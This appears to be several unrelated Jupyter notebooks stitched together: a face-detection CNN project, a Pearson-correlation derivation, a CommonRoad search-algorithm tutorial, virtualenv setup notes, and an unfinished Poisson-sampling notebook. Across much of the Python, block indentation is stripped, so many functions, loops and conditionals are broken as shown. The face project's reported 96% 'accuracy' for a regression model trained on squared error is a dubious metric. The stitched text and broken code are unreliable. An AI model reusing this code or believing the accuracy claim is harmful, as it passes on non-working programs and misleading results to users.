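img = np.arange(100).reshape(10, 10)
out = bulge(img, 5, 5, 4.0)
```

The scale factor is continuous at the radius boundary (it equals 1 there), so the bulge blends smoothly into the unmodified surroundings.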
# This is a supervised learning problem since we are providing the model with labels during training.
#
# ### Exploratory Data Analysis
#
# We started our project using a dataset from Kaggle located here:
# https://www.kaggle.com/drgilermo/face-images-with-marked-landmark-points. This dataset looked very promising at first
# since it seemed to provide many facial landmarks we could work with in order to make our filter respond uniquely to
# different shapes of faces. However, after a discussion about the scope of our project, we determined that would be too
# hard to fit in the time frame of this project, and decided that simply detecting the center of the face and applying the
# filter there would be good enough. This dataset would still work though, as our first attempt was to use only the nose
# tip data from this dataset, which gave a good approximation of the center of the face. Unfortunately, after attempting
# to train models on this dataset, we realized the dataset would not allow our model to be general enough since almost all
# samples in the dataset are zoomed in on someone's face. If we expected our users to put their face right up to the
# camera anyway, there would be no reason to detect faces in the first place. From here we realized we needed to look for
# a better dataset that did not only contain zoomed in images.
#
# After some research, we came across this dataset: https://www.kaggle.com/dataturks/face-detection-in-images. This
# dataset seemed great because it contained people's faces in many different situations, not just when the camera is
# zoomed in on someone's face. The label data was a bounding box around each face, which is less information than the
# previous dataset offered, but by averaging together each corner of the box, we were still able to determine the center
# of the face, which is good enough for our project. The only problem with this dataset is that it is rather small. After
# removing the samples that were of no use to our project, we were left with only 145 data points. When we tried to train
# a model on this dataset, we ended up with either a model that was not accurate enough for our project, or a model that
# was over fit to the training data. Either way, we needed more data.
#
# The solution we came up with was to generate some of our own data. We did this by taking many pictures of ourselves and
# the family we were with in front of a variety of backgrounds, lighting conditions, and facial expressions. We then
# labeled each point in the generated data with the center of the face. In order to aid this process, we created a tool
# inside the main.py file for generating data easily. To start this tool, run `python main.py --mode datagen`, and click
# on the center of your face to create a data point. After closing the program, the results are saved to a file. Writing
# this tool allowed us to generate hundreds of data points in a relatively short amount of time. With the data from the
# dataset combined with our generated data, we were able to create a very general model with high accuracy.
#
# Before cleaning the data, let's download it first. The dataset is committed to this repository for your convenience,
# but the images are simply URLs that must be fetched. Once fetched, they are stored in a file so they do not need to be
# fetched again.
# + pycharm={"name": "#%%\n"}
CACHED_DATA_PATH = 'cached_data'
full_cached_data_path = '{}.npy'.format(CACHED_DATA_PATH)
def fetch_image(url: str) -> np.ndarray:
    """ Fetch an image from a URL and convert it to a numpy array.
    The return value's shape is (height, width, number of channels). If the image is a JPG, there will be three
    channels (RGB). If the image is a PNG, there will be four channels (RGBA).
    """
return np.asarray(Image.open(io.BytesIO(requests.get(url).content)))
# Load in the dataset.
with open('data.json') as file:
raw_data = json.load(file)
# Filter out all images with more than one person. The reason for this is explained in the markdown cell below.
raw_data = list(filter(lambda point: len(point['annotation']) == 1, raw_data))
# Only download the images if they are not already downloaded.
if os.path.exists(full_cached_data_path):
print('Images have already been downloaded. Loading from cache...')
raw_face_data = np.load(full_cached_data_path)
else:
print('Images not found, downloading now...')
raw_face_data = np.array([fetch_image(point['content']) for point in raw_data])
np.save(CACHED_DATA_PATH, raw_face_data)
# -
# Now it is time to clean the data. This involves removing the information that is useless for this project, as well as
# structuring each image in a standard shape so that every image has the same resolution, aspect ratio, color channels,
# etc.
#
# The dataset from the internet was a series of images that were either JPGs or PNGs. These are all converted into numpy
# arrays in the function defined above. Each array returned by the function has a dimension for the image's height, a
# dimension for the image's width, and a dimension for the image's color channels. JPGs have three color channels (RGB)
# while PNGs have four color channels (RGBA). The labels come right from the json file in this repository, which contains
# a list of "annotations" for each image, each storing two x values and two y values representing the bounding box around
# a face. If there are multiple annotations for an image, it means that more than one face is present in the image.
#
# For the scope of our project, we do not feel the need to support multiple faces in an image, so the first step to
# cleaning the data is to remove all images with multiple faces. This step is actually done on the
# `raw_data = list(filter(lambda point: len(point['annotation']) == 1, raw_data))` line above, since removing these images
# before they are downloaded saves a lot of time while downloading the images, and also reduces the image cache size.
#
# The next step in cleaning the data is to convert the bounding box data into point data that represents the center of the
# face. We did this by averaging together the two x points and the two y points as shown below.
# + pycharm={"name": "#%%\n"}
raw_point_data = np.array([[
np.mean([
point['annotation'][0]['points'][0]['x'],
point['annotation'][0]['points'][1]['x'],
]),
np.mean([
point['annotation'][0]['points'][0]['y'],
point['annotation'][0]['points'][1]['y'],
])
] for point in raw_data])
# -
# The point data is still not ready to be used yet though, since it is currently represented by percentages of the whole
# image. For example, if an image had a width of 500 pixels and the x coordinate of the face center was at 100 pixels, it
# would be represented in the data set as 0.2, or 20% of the way through the image. The helper function `center_in_pixels`
# defined below will help translate these percentages into pixels, and the `show_face` function below it will allow us to
# see what one of the images in the dataset looks like, and will also draw a red dot on the face center.
# + pycharm={"name": "#%%\n"}
def center_in_pixels(face: np.ndarray, point: np.ndarray) -> np.ndarray:
""" Helper function for converting a point in percentage to a point in pixels. """
return np.array([[point[0] * face.shape[1]], [point[1] * face.shape[0]]])
def show_face(face: np.ndarray, point: np.ndarray):
    """ Helper function to show a face and draw a red dot at its center. """
plt.imshow(face, cmap='gray')
plt.scatter(*point, c='red')
demo_index = 0
show_face(raw_face_data[demo_index], center_in_pixels(raw_face_data[demo_index], raw_point_data[demo_index]))
# -
# We now have all the data represented in a way that is easy to work with, but it is still not in a format a machine
# learning model can understand. In order to convert each image into this format, we need to standardize each image's
# resolution, aspect ratio, color channels, and more.
#
# We decided that each image should be represented by a 120x120 black and white image, which implies a 1:1 aspect ratio.
# We also decided that each color should be represented by a value between 0 and 1 so it is easier for the model to
# understand, whereas right now it is an integer between 0 and 255.
#
# The function `process_face` below does all this, and the function `process_faces` below that applies the `process_face`
# function to a list of faces and points.
# + pycharm={"name": "#%%\n"}
IMAGE_SIZE = 120
def process_face(face: np.ndarray, point: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
# Delete the alpha channel if one exists.
if face.shape[2] == 4:
face = np.delete(face, np.s_[3], 2)
# Average all the other channels together to create a black and white image.
face = np.mean(face, 2)
# Convert box coordinates to pixels.
pixel_box = center_in_pixels(face, point)
# Make the image a square.
if face.shape[0] > face.shape[1]:
face = np.pad(face, ((0, 0), (0, face.shape[0] - face.shape[1])), 'constant')
else:
face = np.pad(face, ((0, face.shape[1] - face.shape[0]), (0, 0)), 'constant')
# Resize to a more reasonable size.
pixel_box = np.array([
int(pixel_box[0] * (IMAGE_SIZE / face.shape[1])),
int(pixel_box[1] * (IMAGE_SIZE / face.shape[0])),
])
face = np.array(Image.fromarray(face).resize((IMAGE_SIZE, IMAGE_SIZE))) / 255
return face, pixel_box
def process_faces(faces: np.ndarray, points: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
processed_faces = []
processed_points = []
for face, point in zip(faces, points):
processed_face, processed_point = process_face(face, point)
processed_faces.append(processed_face)
processed_points.append(processed_point)
return np.array(processed_faces), np.array(processed_points)
# -
# We can now call the function on the face and point data, and view the same image as before to see the difference.
# + pycharm={"name": "#%%\n"}
generated_data_added = False
face_data, point_data = process_faces(raw_face_data, raw_point_data)
show_face(face_data[demo_index], point_data[demo_index])
# -
# Now that the data is cleaned, we can explore it even more. For example, let's see where all of the face center points are
# located by plotting all of them in a scatter plot.
# + pycharm={"name": "#%%\n"}
def show_scatter():
plt.scatter(
[point[0] for point in point_data],
[point[1] for point in point_data],
c='red',
)
show_scatter()
# -
# The first thing we notice is that many of the data points are clumped in the center, which is not good for our project
# because it is not always the case that the user's face will be in the exact center of the screen. Before we even
# started training our model, this was our first hint that we will eventually need more data.
#
# Next, we add the data generated by the `main.py` script running in datagen mode. No cleaning is
# required since the data generated by the script is already in the desired format. The code below loads in each generated
# dataset and concatenates it with the current data.
#
# **Note**: We have not committed these files to the repository because we felt it was too personal and did not want it
# public on the internet.
# + pycharm={"name": "#%%\n"}
def add_dataset(faces_path: str, points_path: str):
global face_data, point_data
face_data = np.concatenate((face_data, np.load(faces_path)))
point_data = np.concatenate((point_data, np.load(points_path)))
if generated_data_added:
print('Generated data has already been added to the dataset. Skipping...')
else:
add_dataset('generated_data/josh_room_faces.npy', 'generated_data/josh_room_points.npy')
add_dataset('generated_data/josh_kitchen_faces.npy', 'generated_data/josh_kitchen_points.npy')
add_dataset('generated_data/josh_bathroom_faces.npy', 'generated_data/josh_bathroom_points.npy')
add_dataset('generated_data/tiffany_room_faces.npy', 'generated_data/tiffany_room_points.npy')
add_dataset('generated_data/david_living_room_faces.npy', 'generated_data/david_living_room_points.npy')
generated_data_added = True
# -
# We can now see what the last data point in the dataset looks like, which happens to be of my father.
# + pycharm={"name": "#%%\n"}
show_face(face_data[-1], point_data[-1])
# -
# We can also now see the same scatter plot as above, but with the added data, which now looks much more spread out.
# + pycharm={"name": "#%%\n"}
show_scatter()
# -
# ### Model Analysis
#
# Since the input to our project is image data, it makes the most sense to use a convolutional neural network. This choice
# was immediately justified when we tried our first, simple CNN model, which yielded surprisingly accurate results, with
# an accuracy score of 96% after only 20 epochs.
#
# This simple CNN model uses just two convolutional layers, each with relu activation (since relu usually works well for CNNs).
# Following each convolutional layer is a max pooling layer and batch normalization, which are both standard for CNNs.
# This is then followed by a flatten layer, which is needed since our output is 1-dimensional, and a final dense layer so
# we can view the output. Lastly, we used the adam optimizer since this is also a great optimizer for CNNs in general, and
# mean squared error as the loss function since our output is simply a point on a 2-dimensional grid.
#
# To test the model, the final cell in this notebook saves the current model to a file, which is read by the main.py
# script. We can test how well the model works by plugging it directly into our project's frontend and seeing how it
# performs.
# + pycharm={"name": "#%%\n"}
model = Sequential([
    # Note: Even though there is only one color channel, Keras still requires the input to be 3-dimensional.
Conv2D(32, (3, 3), activation='relu', input_shape=(120, 120, 1)),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Flatten(),
Dense(2, activation='relu'),
])
model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
model.fit(face_data.reshape((len(face_data), IMAGE_SIZE, IMAGE_SIZE, 1)), point_data, epochs=20)
# + [markdown] pycharm={"name": "#%% md\n"}
# However, the model above severely overfit due to the small number of convolutional layers, dense layers, and lack of
# dropout layers. Our second model fixed these issues by adding more convolutional layers, an additional dense layer, and
# a dropout layer. All other parts of the model, including the activation functions, optimizer, and loss function, are the
# same. We trained this model for 50 epochs instead of 20 like the model above because we were not as worried about
# overfitting.
#
# Although it is hard to document, we also tuned certain hyperparameters during this step, like the number of filters and
# the kernel size in each convolutional layer, the pool size in each max pooling layer, and the number of units in the
# second-to-last dense layer. We finally decided on the following values since they gave us the best performance after
# some trial and error.
# + pycharm={"name": "#%%\n"}
model = Sequential([
    # Note: Even though there is only one color channel, Keras still requires the input to be 3-dimensional.
Conv2D(32, (3, 3), activation='relu', input_shape=(120, 120, 1)),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(64, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Conv2D(128, (3, 3), activation='relu'),
MaxPooling2D(2, 2),
BatchNormalization(),
Flatten(),
Dropout(0.25),
Dense(64, activation='relu'),
Dense(2, activation='relu'),
])
model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
model.fit(face_data.reshape((len(face_data), IMAGE_SIZE, IMAGE_SIZE, 1)), point_data, epochs=50)
# + [markdown] pycharm={"name": "#%% md\n"}
# This model maintained a good accuracy score while not overfitting as much, so we decided to use it as our final model.
#
# The code below saves the model to a file so it can be read by the main.py file.
# + pycharm={"name": "#%%\n"}
model.save('model.h5')
print('Model saved to {}/model.h5.'.format(os.getcwd()))
# + [markdown] pycharm={"name": "#%% md\n"}
# ### Conclusion
#
# Face Filter was created to detect faces in images and apply a filter to them, and our code in this notebook combined
# with the code in main.py does exactly that. Our project started by downloading, cleaning up and reformatting the data,
# which included writing a tool for generating our own data to support it. We then tried many different convolutional
# neural networks and tuned their hyperparameters to see what worked and what didn't work. The model we eventually landed
# on is properly tuned to be accurate while still not overfitting.
#
# We learned a lot during this project. There was a lot of image manipulation involved, which required learning many numpy
# functions for manipulating arrays of raw image data. Additionally, we probably went through more iterations of our
# convolutional neural network than in any homework or Kaggle competition, which really taught us what effect each
# hyperparameter has on the model's overall performance. Armed with this knowledge, we feel like we could create a CNN for
# just about anything now.
#
# There are many improvements we could have made to our project if we had more time. First off, while our model worked
# well overall, it still has much room for improvement. We still have a relatively large margin of error, at least
# compared to big companies like Facebook, Snapchat, or TikTok. Having more data would probably fix this, as the 300
# samples we ended up with are still not much data for a convolutional neural network. Additionally, we could improve our project
# by adding support for multiple faces, which would not be too hard considering our original dataset is already set up for
# multiple faces. Lastly, we could improve our frontend by adding more filters, allowing users to take pictures and save
# them (outside of datagen mode), and even make this a mobile app like Snapchat.
Project.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Pearson Correlation Vs. Z-normalized Euclidean Distance
#
# It is [well understood](https://arxiv.org/pdf/1601.02213.pdf) that the z-normalized Euclidean distance, $ED_{z-norm}$, and the Pearson correlation, $PC$, between any two subsequences with length $m$ share the following relationship:
#
# $ED_{z-norm} = \sqrt {2 * m * (1 - PC)}$
#
# Naturally, when the two subsequences are perfectly correlated (i.e., $PC = 1$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - 1)}
# \\
# ={}&
# \sqrt {2 * m * 0}
# \\
# ={}&
# \sqrt {0}
# \\
# ={}&
# 0
# \\
# \end{align}
#
# Similarly, when the two subsequences are completely uncorrelated (i.e., $PC = 0$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - 0)}
# \\
# ={}&
# \sqrt {2 * m * 1}
# \\
# ={}&
# \sqrt {2 * m}
# \\
# \end{align}
#
# In other words, the largest possible z-normalized distance between any pair of subsequences with length $m$ is $\sqrt{2 * m}$. The maximum distance can never be bigger!
#
# Finally, when two subsequences are anti-correlated (i.e., $PC = -1$), then we get:
#
# \begin{align}
# ED_{z-norm} ={}&
# \sqrt {2 * m * (1 - PC)}
# \\
# ={}&
# \sqrt {2 * m * (1 - (-1))}
# \\
# ={}&
# \sqrt {2 * m * 2}
# \\
# ={}&
# \sqrt {4 * m}
# \\
# ={}&
# 2 * \sqrt {m}
# \\
# \end{align}
#
# Note that while $2 * \sqrt {m}$ (i.e., anti-correlated) is obviously larger than $\sqrt {2m}$ (i.e., uncorrelated), it is basically impossible for a matrix profile distance to be "worse" than uncorrelated (i.e., larger than $\sqrt {2m}$) due to the fact that it is defined as the distance to its one-nearest-neighbor. For example, given a subsequence `T[i : i + m]`, the matrix profile is supposed to return the z-norm distance to its one-nearest-neighbor. So, even if there existed another z-norm subsequence, `T[j : j + m]`, along the time series that was perfectly anti-correlated with `T[i : i + m]`, then any subsequence that is even slightly shifted away from location `j` must have a smaller distance than $2 * \sqrt {m}$. Therefore, a perfectly anti-correlated subsequence would/could (almost?) never be a one-nearest-neighbor to `T[i : i + m]` especially if `T` is long.
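The identity above is easy to verify numerically. A minimal sketch with two random sequences standing in for z-normalized subsequences (note that `z_norm` must use the population standard deviation for the identity to hold exactly):

```python
import numpy as np

def z_norm(a):
    # Population standard deviation (ddof=0), matching the identity.
    return (a - a.mean()) / a.std()

rng = np.random.default_rng(0)
m = 50
a, b = rng.normal(size=m), rng.normal(size=m)

ed_znorm = np.linalg.norm(z_norm(a) - z_norm(b))
pc = np.corrcoef(a, b)[0, 1]

# The two quantities agree up to floating-point error.
print(ed_znorm, np.sqrt(2 * m * (1 - pc)))
```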
docs/Pearson.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial: Uninformed Search Algorithms
#
# This tutorial shows how we can combine motion primitives of vehicles, i.e., short trajectory segments, with uninformed search algorithms to find feasible trajectories that connect the **initial state** and the **goal region** of a given planning problem.
# ## 0. Preparation
# Before you proceed with this tutorial, make sure that
#
# * you have gone through the tutorial for **CommonRoad Input-Output**.
# * you have installed all necessary modules for **CommonRoad Search** according to the installation manual.
#
# Let's start with importing relevant modules and classes for setting up the automaton and the CommonRoad (CR) scenario.
# +
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
import os
import sys
path_notebook = os.getcwd()
# add the SMP folder to python path
sys.path.append(os.path.join(path_notebook, "../../"))
# add the 1_search_algorithms folder to python path
sys.path.append(os.path.join(path_notebook, "../"))
import matplotlib.pyplot as plt
from commonroad.common.file_reader import CommonRoadFileReader
from commonroad.visualization.mp_renderer import MPRenderer
from SMP.motion_planner.motion_planner import MotionPlanner
from SMP.maneuver_automaton.maneuver_automaton import ManeuverAutomaton
from SMP.motion_planner.utility import plot_primitives, display_steps
# -
# ## 1. Loading CR Scenario and Planning Problem
# In the next step, we load a CommonRoad scenario and its planning problem, which should be solved with the search algorithms. The meanings of the symbols in a scenario are explained as follows:
# * **Dot**: initial state projected onto the position domain
# * **Red rectangle**: static obstacle
# * **Yellow rectangle**: goal region projected onto the position domain
# +
# load scenario
path_scenario = os.path.join(path_notebook, "../../scenarios/tutorial/")
id_scenario = 'ZAM_Tutorial_Urban-3_2'
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
# plot the scenario and the planning problem set
plt.figure(figsize=(15, 5))
renderer = MPRenderer()
scenario.draw(renderer)
planning_problem_set.draw(renderer)
plt.gca().set_aspect('equal')
plt.margins(0, 0)
renderer.render()
plt.show()
# -
# ## 2. Generating a Maneuver Automaton
#
# In the following, we load the pre-generated motion primitives from an XML-File, and generate a **Maneuver Automaton** out of them.
# The maneuver automaton used for this tutorial consists of 7 motion primitives; the connectivity within the motion primitives are also computed and stored. Some additional explanations on the motion primitives:
# * The motion primitives are generated for the *Kinematic Single Track Model* (see [Vehicle Model Documentation](https://gitlab.lrz.de/tum-cps/commonroad-vehicle-models/-/blob/master/vehicleModels_commonRoad.pdf)) with parameters taken from vehicle model *BMW320i* (id_type_vehicle=2).
# * The motion primitives have a constant driving velocity of 9 m/s, varying steering angles with constant steering angle velocity, and a duration of 0.5 seconds. We assume constant input during this period.
# * The motion primitives are generated for all combinations of the steering angles of values 0 rad and 0.2 rad at the initial state and the final state, thereby producing 2 (initial states) x 2 (final states) = 4 primitives. Except for the primitive moving straight (with 0 rad steering angle at the initial and the final states), the remaining 3 left-turning primitives are mirrored with respect to the x-axis, resulting in a total of 7 motion primitives.
# * Two motion primitives are considered connectable if the velocity and the steering angle of the final state of the preceding primitive are equal to those of the initial state of the following primitive.
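The connectability rule in the last bullet can be sketched with hypothetical primitive objects (plain dataclasses for illustration, not the actual `ManeuverAutomaton` API):

```python
from dataclasses import dataclass

@dataclass
class State:
    velocity: float
    steering_angle: float

@dataclass
class Primitive:
    initial: State
    final: State

def is_connectable(prev: Primitive, succ: Primitive, tol: float = 1e-6) -> bool:
    # Two primitives connect if the final velocity and steering angle of the
    # preceding primitive match the initial ones of the following primitive.
    return (abs(prev.final.velocity - succ.initial.velocity) <= tol and
            abs(prev.final.steering_angle - succ.initial.steering_angle) <= tol)

p1 = Primitive(State(9.0, 0.0), State(9.0, 0.2))
p2 = Primitive(State(9.0, 0.2), State(9.0, 0.0))
print(is_connectable(p1, p2))  # True
```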
# +
# load the xml file that stores the motion primitives
name_file_motion_primitives = 'V_9.0_9.0_Vstep_0_SA_-0.2_0.2_SAstep_0.2_T_0.5_Model_BMW_320i.xml'
# generate automaton
automaton = ManeuverAutomaton.generate_automaton(name_file_motion_primitives)
# plot motion primitives
plot_primitives(automaton.list_primitives)
# -
# ## 3. Search algorithms
# Next, we demonstrate the search results for the following algorithms:
# 1. Breadth-First Search (BFS)
# 2. Depth-First Search (DFS)
# 3. Depth-Limited Search (DLS)
# 4. Uniform-Cost Search (UCS)
#
# For each of the algorithms, we create a corresponding motion planner implemented in the **MotionPlanner** class, with the scenario, the planning problem, and the generated automaton as the input. The source codes are located at **SMP/motion_planner/search_algorithms/**
#
# After executing the code block for every algorithm, you will see a **"visualize"** button directly beneath the **"iteration"** slider. Click the **"visualize"** button and let the search algorithm run through; once it's completed, you can use the slider to examine all intermediate search steps. The meanings of the colors and lines are explained as follows:
# * **Yellow solid:** frontier
# * **Yellow dashed:** collision
# * **Red solid:** currently exploring
# * **Gray solid:** explored
# * **Green solid:** final solution
# ### 3.1 Breadth-First Search (BFS)
# The BFS algorithm uses a FIFO (First-In First-Out) queue for pushing the nodes.
# +
# construct motion planner
planner_BFS = MotionPlanner.BreadthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_BFS.state_initial, planner_BFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_BFS.execute_search,
config=planner_BFS.config_plot)
# -
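The FIFO expansion order can be illustrated generically, independent of motion primitives. A sketch on a plain adjacency dict, not the SMP planner:

```python
from collections import deque

def bfs(graph, start, goal):
    # Breadth-first search: a FIFO queue guarantees nodes are expanded in
    # order of increasing depth, so the first path found uses the fewest steps.
    frontier = deque([[start]])
    explored = {start}
    while frontier:
        path = frontier.popleft()   # FIFO: oldest frontier entry first
        if path[-1] == goal:
            return path
        for nxt in graph.get(path[-1], []):
            if nxt not in explored:
                explored.add(nxt)
                frontier.append(path + [nxt])
    return None

graph = {'A': ['B', 'C'], 'B': ['D'], 'C': ['D'], 'D': []}
print(bfs(graph, 'A', 'D'))  # ['A', 'B', 'D']
```

Replacing `popleft()` with `pop()` (LIFO) turns this into the depth-first search of the next section.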
# ### 3.2 Depth-First Search (DFS)
# The DFS algorithm uses a LIFO (Last-In First-Out) queue for pushing the nodes.
# +
# construct motion planner
planner_DFS = MotionPlanner.DepthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DFS.state_initial, planner_DFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DFS.execute_search,
config=planner_DFS.config_plot)
# -
# In this scenario, we were lucky enough to find a solution using DFS. However, DFS is not complete, i.e., it is not guaranteed to find a solution if one exists. To justify this claim, we slightly manipulate the scenario such that the goal region is shifted by 4 m along the y-axis, and re-run the search.
# +
import numpy as np
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
for state in planning_problem.goal.state_list:
state.position = state.position.translate_rotate(np.array([0, 4]), 0)
# Plot the scenario and the planning problem set
plt.figure(figsize=(15, 5))
renderer = MPRenderer()
scenario.draw(renderer)
planning_problem_set.draw(renderer)
plt.gca().set_aspect('equal')
plt.margins(0, 0)
renderer.render()
plt.show()
# +
# construct motion planner
planner_DFS = MotionPlanner.DepthFirstSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DFS.state_initial, planner_DFS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DFS.execute_search,
config=planner_DFS.config_plot)
# -
# As you can see, in this case DFS was not able to find a solution, since DFS would go infinitely deep when appending motion primitives (leading to an infinite state space). **Question**: is this also the case with BFS? You can test it out.
#
# To overcome this problem, we introduce a depth limit, resulting in Depth-Limited Search (DLS).
# ### 3.3 Depth-Limited Search (DLS)
#
# Now let's run the algorithm and see what changes with the introduced depth limit. Here we set the limit to 7, as we know from the result of BFS that there exists a solution consisting of 7 motion primitives.
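# The depth limit can be grafted onto plain DFS in a few lines. A minimal recursive sketch (again using a toy successor function, independent of the planner):

```python
def dls(node, successors, is_goal, limit):
    """Depth-limited search: DFS that refuses to expand below `limit` steps."""
    if is_goal(node):
        return [node]
    if limit == 0:
        return None  # cutoff reached
    for child in successors(node):
        result = dls(child, successors, is_goal, limit - 1)
        if result is not None:
            return [node] + result
    return None

succ = lambda n: [2 * n, 2 * n + 1] if n < 8 else []  # toy successors
print(dls(1, succ, lambda n: n == 5, limit=2))  # [1, 2, 5]
print(dls(1, succ, lambda n: n == 5, limit=1))  # None -- the goal lies below the limit
```

# A too-small limit makes the search incomplete again; a too-large limit re-creates DFS's depth problem.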
# +
limit_depth = 7
# construct motion planner
planner_DLS = MotionPlanner.DepthLimitedSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_DLS.state_initial, planner_DLS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_DLS.execute_search,
config=planner_DLS.config_plot, limit_depth=limit_depth)
# -
# As you can see, DLS now finds a solution. **Question**: what happens if you have a lower or higher depth limit? Try it out.
# ### 3.4 Uniform-Cost Search (UCS)
#
# The algorithms we have considered so far do not take any cost into account during the search. In the following, we look at Uniform-Cost Search. UCS is optimal for any (strictly positive) step costs, as it always expands the node with the lowest path cost g(n). In this example, the cost is the time needed to reach the goal; thus, our cost g(n) is the time it took to reach the current final state.
#
# UCS is based on the Best-First Search algorithm, which we will also use for Greedy-Best-First Search and A\* Search in the next tutorial. These algorithms only differ in their evaluation function: in UCS, the evaluation function is f(n) = g(n).
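# The shared skeleton can be sketched as a priority-queue search parameterized by the evaluation function. The toy weighted graph below is an assumption for illustration; its edge weights play the role of the time needed to execute a motion primitive.

```python
import heapq

def best_first_search(start, successors, is_goal, f):
    """Always expand the frontier node with the lowest f-value.
    With f(g) = g (path cost so far) this is Uniform-Cost Search."""
    frontier = [(f(0), 0, start, [start])]  # (priority, cost, node, path)
    visited = set()
    while frontier:
        _, cost, node, path = heapq.heappop(frontier)
        if is_goal(node):
            return cost, path
        if node in visited:
            continue
        visited.add(node)
        for child, step_cost in successors(node):
            g = cost + step_cost
            heapq.heappush(frontier, (f(g), g, child, path + [child]))
    return None

graph = {'A': [('B', 1), ('C', 4)], 'B': [('C', 1), ('D', 5)],
         'C': [('D', 1)], 'D': []}
print(best_first_search('A', lambda n: graph[n], lambda n: n == 'D',
                        f=lambda g: g))  # (3, ['A', 'B', 'C', 'D'])
```

# Greedy-Best-First Search and A* only change `f`: a heuristic h(n) and g(n) + h(n), respectively.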
# +
# read in scenario and planning problem set
scenario, planning_problem_set = CommonRoadFileReader(path_scenario + id_scenario + '.xml').open()
# retrieve the first planning problem in the problem set
planning_problem = list(planning_problem_set.planning_problem_dict.values())[0]
# construct motion planner
planner_UCS = MotionPlanner.UniformCostSearch(scenario=scenario,
planning_problem=planning_problem,
automaton=automaton)
# prepare input for visualization
scenario_data = (scenario, planner_UCS.state_initial, planner_UCS.shape_ego, planning_problem)
# display search steps
display_steps(scenario_data=scenario_data, algorithm=planner_UCS.execute_search,
config=planner_UCS.config_plot)
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Congratulations!
#
# You have finished the tutorial on uninformed search algorithms! Next, you can proceed with the tutorial on informed search algorithms.
tutorials/1_search_algorithms/tutorial_uninformed_search.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
pip freeze
# List the currently installed Python packages and their versions
pip install virtualenv
# Install `virtualenv`, the package needed to create virtual environments
virtualenv venv -p \
C:\Users\lucaslin\AppData\Local\Programs\Python\Python36-32\python.exe
# Create a virtual environment from an existing Python executable, matching that executable's Python version
#
# The environment is named `venv`
#
# Note: the trailing \ on the first line is a line-continuation character, not part of the path
# +
# linux/Mac
source venv/bin/activate
deactivate
# Windows
.\venv\Scripts\activate.bat
.\venv\Scripts\deactivate.bat
# -
# Activate and deactivate the virtual environment
pip install Flask
pip install Flask-RESTful
pip install Flask-JWT
# After activating the virtual environment, the prompt is prefixed with `(venv)`
#
# Then install the packages you need
Create Virtual Environment.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import matplotlib.pyplot as plt
# # Generating samples from a **Homogeneous** Poisson process
#
# A Poisson process generates a series of events. In many situations it can be useful to simulate data generated from a Poisson process. This notebook goes through some examples of how to do this.
#
# For a **homogeneous** process, we describe the process by a rate of events in a time window, $\lambda$. The count (number) of events observed is distributed as $\text{Poisson}(\lambda T)$, where $T$ is the length of the window of observation. The time between events (the "inter-event interval") is distributed as $\text{Exponential}$ with mean $\frac{1}{\lambda}$.
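# As a quick numerical sanity check of these two facts (this sketch uses NumPy's newer `default_rng` interface, unlike the legacy `np.random` calls in the rest of this notebook):

```python
import numpy as np

rng = np.random.default_rng(0)
L, T, K = 10, 1, 100_000

# Counts per window are Poisson(L*T): mean and variance should both be near L*T = 10.
counts = rng.poisson(L * T, size=K)
print(counts.mean(), counts.var())

# Inter-event intervals are Exponential with mean 1/L = 0.1 s.
isis = rng.exponential(1 / L, size=K)
print(isis.mean())
```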
# +
# Describe our Poisson process
L = 10 # event rate (Hz)
T = 1 # duration during which events occur (s)
# We will observe the process a large number of times (to test efficiency)
K = 100000 # number of trials of random process
# -
# ### Three methods:
# - Generate using a Bernoulli approximation with very small bins of time.
# - Generate ISIs from an exponential RV.
# - Generate using Poisson and Uniform trick
# +
# %%time
# Generating using bernoulli approximation
nbins = 1000
DeltaT = T/nbins  # duration of each small bin
RateVector = L * DeltaT  # P(event in a bin) = rate x bin duration
